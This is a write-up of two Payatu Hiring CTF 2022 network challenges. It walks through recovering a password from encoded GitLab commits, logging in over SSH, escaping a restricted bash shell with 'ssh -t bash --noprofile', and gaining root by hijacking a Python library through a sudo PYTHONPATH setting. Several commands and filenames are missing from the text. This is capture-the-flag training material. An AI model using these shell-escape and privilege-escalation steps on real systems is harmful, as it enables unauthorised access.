Payatu Hiring CTF 2022

P4ul Jeremi4h
3 min readOct 15, 2022

Network 1,2 Writeup

Hello Guys , Today we Are Going to have a look at a cool Network x Osint Challenge from Payatu CTF 2022

1. Mistake — 1

Category: Network

Points :150

Mmm, Just an ordinary Site?

It seems interesting

All of the hyperlinks are empty except the git lab


From The Above Image we know that the username is saddetail

  1. Lets Dig All The Commits

2.OfCourse , just another Base64 !

Base64 Receipe Must be ROT (The Caeser Hint)
take-a-few-pages-from-my-book (password)
  • So , We can Conclude that it is the password for Something

Back To The Challenge Description:

Note: When you find your way to the hotel, please note that Room № 22 is under repair, you can check in at Room № 9922 instead

Number 22 , denotes SSH

  • All we need is just a host to do SSH on The custom port number 9922


❯ host has address
( also used to do SSH)

Hurray ! , We are In

But We Are Restricted with RBASH

Restricted Shell:The restricted shell is a Unix shell that restricts some of the capabilities available to an interactive user session, or to a shell script, running within it

[+] Bypassing The restriction

  • -t "bash --noprofile "can be used to Bypass the Restrictions
ssh saddetail@ -p 9922  -t "bash --noprofile"

[1] Reading the file even in the restricted mode

saddetail@6dbb2a245253:~$ echo “`<flag.txt`”flag{w@tch_th0s3_3xtra_Co5mi3s}`

[2] By ByPassing The RBASH


Mistake -2

  • So we need some privilege to Read the flag.txt at /root
saddetail@6dbb2a245253:~$ ls
__pycache__ bin flag.txt

[+] Library Hijacking using Python

saddetail@6dbb2a245253:/opt$ head  
import os
import requests
import dummy
except ImportError:
print("Working Fine")
def add(x, y):
return x + y
  • Here dummy is the custom library which can be created by us to exploit the
  1. create a file called and write the payload in it
saddetail@6dbb2a245253:~$ cat 
import os

2. Lets create a PYTHONPATH to access the root privilege ,

saddetail@6dbb2a245253:~$ sudo PYTHONPATH=/home/saddetail/ /usr/bin/python3 /opt/[I'M ROOT ! ] root@6dbb2a245253:/home/saddetail# iduid=0(root) gid=0(root) groups=0(root)


root@6dbb2a245253:/home/saddetail# cat flag.txtflag{w@tch_th0s3_3xtra_Co5mi3s}

Nice Challenge From Payatu Team ❤

Thanks For Reading ❤